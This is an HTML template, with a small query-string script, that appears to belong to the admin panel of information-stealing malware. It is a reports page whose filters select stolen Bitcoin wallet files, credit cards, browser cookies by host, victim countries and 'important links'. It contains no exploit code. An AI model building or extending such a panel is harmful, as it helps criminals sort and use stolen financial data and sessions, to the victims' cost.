<div class="info-text1">
				<center>Reports [%count%]</center>
				
				

				<div class="spoiler">

				<!--* Добавлен tabindex="-1" для снятия фокуса при переходе по "tab" -->
				<input style="width:360px;height:45px;" type="checkbox" tabindex="-1" >
					 <div class="box">
						 <span class=close>Hide Filters</span><span class=open>Show Filters</span>
						 <blockquote class="Untext">
									<form action="?page=reports" name="myform">
										<table class='config-table'>
											<tr>
												<td><div class='whitetxt'>Date from:</div></td>   	
												<td><input type="date" class="edit" name="datefrom" value=""></td>
											</tr>
											<tr>
												<td><div class='whitetxt'>Date up: </div></td> 		
												<td><input type="date" class="edit" name="dateup" value=""></td>
											</tr>
											<tr>
												<td><div class='whitetxt'>Filter:</div></td>			
												<td><input type="text" class="edit" name="search" value=""></td>
											</tr>
											<tr>
												<td><div class='whitetxt'>Include BTC files:</div></td>
												<td><input type="checkbox" name="inc_btc" value="1"></td>												
											</tr>
											<tr>
												<td><div class='whitetxt'>Include CC:</div></td>
												<td><input type="checkbox" name="inc_cc" value="1" ></td>												
											</tr>
											<tr>
												<td><div class='whitetxt'>Include cookie host:</div></td> 
												<td><input type="text" class="edit" name="cookiesearch" value=""></td>
											</tr>
											
											<tr>
												<td><div class='whitetxt'>Countries filter:</div></td> 
												<td><input type="text" class="edit" name="countries" value=""></td>
											</tr>
											
											<tr>
												<td><div class='whitetxt'>Contain important links:</div></td>
												<td><input type="checkbox" name="inc_il" value="1" ></td>												
											</tr>
											
											<input type="radio" name="status" value="0" checked> Reports<Br>
											<input type="radio" name="status" value="1" %status1%> Trashed reports<Br>
											<input type="radio" name="status" value="2" %status2%> All<Br>
											
															<input type="hidden" name="page" value="reports">
											<tr>
															<td></td>
															<td><input type="submit" value=">>" class="sbutton"></td>
											</tr>
										</table>
									</form>
						
						 </blockquote>
					 </div>
					 
					 
					 

				 </div>
			</div>
			
<script type="text/javascript">
var data=location.search;
if(data) {
    data=location.search.substring(1); // remove the '?'
    data=data.split('&');
    var pairs={};
    for(var i=0; i<data.length; i++){
        var tmp=data[i].split('=');
        pairs[tmp[0]]=tmp[1];
    	}
    var f = document.myform;
    for (var i in pairs) {
        if(f.elements[i]) {
				f.elements[i].value = decodeURIComponent(pairs[i]);
				if(f.elements[i].type=='checkbox')
					if(pairs[i]=='1')
						f.elements[i].checked = true;
			}
        }
    }
</script>
			

			